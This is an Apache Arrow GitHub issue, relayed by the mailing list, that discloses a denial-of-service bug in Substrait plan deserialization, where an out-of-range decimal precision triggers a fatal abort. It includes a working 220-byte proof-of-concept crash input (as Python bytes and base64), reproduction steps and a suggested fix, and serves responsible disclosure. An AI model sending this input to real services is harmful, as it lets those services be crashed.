OwenSanzas opened a new issue, #50230:
URL: https://github.com/apache/arrow/issues/50230
## Summary
A 220-byte Substrait `Plan` describing a decimal type with precision outside
`[1, 38]` (the PoC uses 42) fed to the public
`arrow::engine::DeserializePlan`
API aborts the process. `FromProtoImpl<Decimal128Type>` constructs the type
via
`make_shared`, bypassing the validating `Decimal128Type::Make()` factory, so
the
constructor's `ARROW_CHECK_OK(ValidateDecimalPrecision(...))` fires a fatal
abort
instead of returning `Status::Invalid`. Any service that deserializes an
untrusted Substrait plan can be crashed (denial of service).
Tested at pinned commit `16fe34250a2ef261790b9cc414fdf0831669cf9f`
(25.0.0-SNAPSHOT).
## Root Cause
Arrow's Substrait type converter maps a `substrait::Type::Decimal` to an
`arrow::Decimal128Type` through the generic helper
`FromProtoImpl<Decimal128Type>`,
which calls `std::make_shared<Decimal128Type>(precision, scale)` directly —
i.e.
it invokes the **constructor**, not the validating factory
`Decimal128Type::Make()`.
`Decimal128Type::Make()` validates the precision and returns
`Status::Invalid("Decimal precision out of range [1, 38]: ...")` on bad
input.
The constructor, by contrast, asserts:
`ARROW_CHECK_OK(ValidateDecimalPrecision(...))`
is a *fatal* check that calls `std::abort()` (via `ArrowLog` /
`CerrLog::~CerrLog`)
when validation fails. Because the Substrait `decimal.precision()` is an
attacker-controlled `int32` taken straight from the protobuf, any value
outside
`[1, 38]` aborts the process.
Vulnerable code — the bypass
(`cpp/src/arrow/engine/substrait/type_internal.cc:55-61, 171-175`):
```cpp
template <typename ArrowType, typename TypeMessage, typename... A>
Result<std::pair<std::shared_ptr<DataType>, bool>> FromProtoImpl(const
TypeMessage& type,
A&&...
args) {
return std::make_pair(std::static_pointer_cast<DataType>(
std::make_shared<ArrowType>(std::forward<A>(args)...)),
IsNullable(type));
}
...
case substrait::Type::kDecimal: {
const auto& decimal = type.decimal();
return FromProtoImpl<Decimal128Type>(decimal, decimal.precision(),
decimal.scale());
}
```
Vulnerable code — the fatal check (`cpp/src/arrow/type.cc:1520-1523`):
```cpp
Decimal128Type::Decimal128Type(int32_t precision, int32_t scale)
: DecimalType(type_id, 16, precision, scale) {
ARROW_CHECK_OK(ValidateDecimalPrecision<Decimal128Type>(precision)); //
fatal abort
}
```
`Decimal128Type::Make()` (immediately below the constructor) is the non-fatal
path that returns `Status::Invalid` for the same condition; the Substrait
converter does not use it.
Call chain (`DeserializePlan` -> decimal field):
```
arrow::engine::DeserializePlan serde.cc:229 (public
API)
-> FromProto(Rel) relation_internal.cc:400
-> FromProto(NamedStruct) type_internal.cc:523
-> FieldsFromProto type_internal.cc:93
-> FromProto(Type) type_internal.cc:174
-> FromProtoImpl<Decimal128Type> type_internal.cc:59 //
make_shared, bypasses Make()
-> Decimal128Type::Decimal128Type type.cc:1522 //
ARROW_CHECK_OK -> abort
```
## PoC
220 bytes — a `Plan` whose `NamedStruct` declares a decimal field with
`precision = 42` (outside `[1, 38]`). The byte sequence `c2 01 04 08 02 10
2a`
encodes `substrait.Type.decimal` (field 24) with `precision` (field 2) =
`0x2a`
= 42.
```python
# generate_poc.py — re-create the crash input from bytes
poc =
(b'\x1a\xcc\x01\n\xc9\x01\n\xc6\x01\x12\xbe\x01\n\x02c0\n\x02c1\n\x02c2'
b'\n\x02c3\n\x02c4\n\x02c5\n\x02c6\n\x02c7\n\x02c8\n\x02c9\n\x03c10'
b'\n\x03c11\n\x03c12\n\x03c13\n\x03c14\n\x03c15\n\x03c16\n\x03c17'
b'\x12l\n\x02\n\x00\n\x02\x12\x00\n\x02\x1a\x00\n\x02*\x00\n\x02:\x00'
b'\n\x02R\x00\n\x02Z\x00\n\x02b\x00\n\x02j\x00\n\x02r\x00\n\x03\x82'
b'\x01\x00\n\x03\x8a\x01\x00\n\x07\xc2\x01\x04\x08\x02\x10*\n\x05\xaa'
b'\x01\x02\x08\x04\n\x05\xb2\x01\x02\x08\x08\n\x07\xda\x01\x04\n\x02:'
b'\x00\n\x0b\xe2\x01\x08\n\x02b\x00\x12\x02:\x00\n\x0b\xca\x01\x08\n'
b'\x02*\x00\n\x02b\x00:\x03\n\x01t2\x0b\x10,*\x07o2-seed')
open("poc.bin", "wb").write(poc)
```
Crash input size: 220 bytes (`poc/poc.bin`, md5
`b2ae2aac5e277e07f5ea16901e088b4a`).
## Reproduction
Build Arrow C++ from source with `-DARROW_SUBSTRAIT=ON` and
AddressSanitizer, then deserialize the
attached Substrait plan through the public API:
```cpp
#include <arrow/engine/substrait/serde.h>
// auto buf = ...read poc.bin...;
auto result = arrow::engine::DeserializePlan(*buf); // fatal ARROW_CHECK
abort here
```
The decimal type converter `FromProtoImpl<Decimal128Type>` builds the type
via
`std::make_shared<Decimal128Type>(precision, scale)`, bypassing the
validating `Decimal128Type::Make()`
factory; the ctor's `ARROW_CHECK_OK(ValidateDecimalPrecision(...))` aborts
on precision 42 (outside [1,38]):
```
type.cc: Check failed: _s.ok() ... Decimal precision out of range [1, 38]: 42
```
`make_shared<...>` bypass is still present in current `master`
(`cpp/src/arrow/engine/substrait/type_internal.cc:59`).
PoC: 220 bytes (recreate from the base64 below).
## Suggested Fix
Route the decimal conversion through the validating factory
`Decimal128Type::Make()` (which returns `Status::Invalid` on out-of-range
precision) instead of constructing via `make_shared`:
```diff
--- a/cpp/src/arrow/engine/substrait/type_internal.cc
+++ b/cpp/src/arrow/engine/substrait/type_internal.cc
@@
case substrait::Type::kDecimal: {
const auto& decimal = type.decimal();
- return FromProtoImpl<Decimal128Type>(decimal, decimal.precision(),
decimal.scale());
+ ARROW_ASSIGN_OR_RAISE(
+ auto dtype, Decimal128Type::Make(decimal.precision(),
decimal.scale()));
+ return std::make_pair(std::move(dtype), IsNullable(decimal));
}
```
This propagates a non-OK `Status` out of `DeserializePlan` on malformed
precision
rather than aborting. Other `FromProtoImpl<...>` arms that wrap constructors
with
fatal checks deserve the same audit, but only the decimal path is reproduced
here.
## PoC bytes (self-contained)
The trigger input is **220 bytes** (`poc/poc.bin`).
Recreate it exactly with:
```bash
base64 -d > poc.bin <<'B64'
GswBCskBCsYBEr4BCgJjMAoCYzEKAmMyCgJjMwoCYzQKAmM1CgJjNgoCYzcKAmM4CgJjOQoDYzEwCgNjMTEKA2MxMgoDYzEzCgNj
MTQKA2MxNQoDYzE2CgNjMTcSbAoCCgAKAhIACgIaAAoCKgAKAjoACgJSAAoCWgAKAmIACgJqAAoCcgAKA4IBAAoDigEACgfCAQQI
AhAqCgWqAQIIBAoFsgECCAgKB9oBBAoCOgAKC+IBCAoCYgASAjoACgvKAQgKAioACgJiADoDCgF0MgsQLCoHbzItc2VlZA==
B64
```
## Credit
Aisle Research (Ze Sheng (O2Lab & TAMU), Dmitrijs Trizna, Luigino Camastra,
Guido Vranken).
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.
To unsubscribe, e-mail: [email protected]
For queries about this service, please contact Infrastructure at:
[email protected]